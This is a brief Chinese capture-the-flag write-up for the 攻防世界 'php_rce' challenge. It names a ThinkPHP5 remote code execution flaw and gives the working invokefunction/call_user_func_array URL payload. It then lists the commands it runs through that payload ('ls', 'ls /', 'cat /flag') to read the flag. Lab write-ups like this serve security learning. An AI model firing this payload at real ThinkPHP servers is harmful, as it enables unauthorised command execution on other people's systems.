在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
攻防世界系列:php_rce1.打开题目看到这个还是很懵的,点开任意连接都是真实的场景。
2.ThinkPHP5,这里我们需要知道它存在远程代码执行的漏洞。?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令) ls查看 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
上一级 ls ../
根目录下 ls /
发现 flag打开flag cat /flag
|
2022-08-17
2022-07-18
2022-11-06
2022-08-17
2022-07-30
请发表评论